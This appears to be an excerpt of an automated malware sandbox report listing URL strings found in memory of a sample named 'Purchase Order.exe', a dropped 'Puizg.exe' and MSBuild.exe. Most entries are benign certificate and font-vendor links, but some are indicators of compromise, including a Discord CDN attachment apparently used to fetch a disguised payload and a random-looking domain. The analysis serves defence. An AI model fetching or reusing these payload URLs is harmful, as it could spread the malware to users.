                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0f
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                    Source: Purchase Order.exe, 00000000.00000002.371704662.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.507585311.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.507971683.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                    Source: MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                    Source: MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                    Source: MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                    Source: MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
                    Source: MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514404668.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.513615137.0000000006464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398995729.0000000006D2C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                    Source: MSBuild.exe, 00000011.00000003.399105815.0000000006D60000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514457454.0000000006D63000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                    Source: MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                    Source: MSBuild.exe, 00000011.00000003.398047213.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398047213.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                    Source: MSBuild.exe, 00000011.00000003.399105815.0000000006D60000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                    Source: MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                    Source: MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                    Source: MSBuild.exe, 00000011.00000003.398032121.0000000006466000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398159493.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                    Source: MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                    Source: MSBuild.exe, 00000011.00000003.398995729.0000000006D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                    Source: MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                    Source: MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Purchase Order.exe, 00000000.00000002.371704662.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.507585311.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.507971683.0000000002681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: Puizg.exe, Puizg.exe, 00000017.00000000.408987294.0000000000282000.00000002.00000001.01000000.0000000A.sdmp, Puizg.exe, 00000017.00000002.507971683.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, Puizg.exe.0.drString found in binary or memory: https://cdn.discordapp.com/attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eD1SuZymOZStl.or
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eD1SuZymOZStl.org
                    Source: MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eca.hinet.net/repository0
                    Source: MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
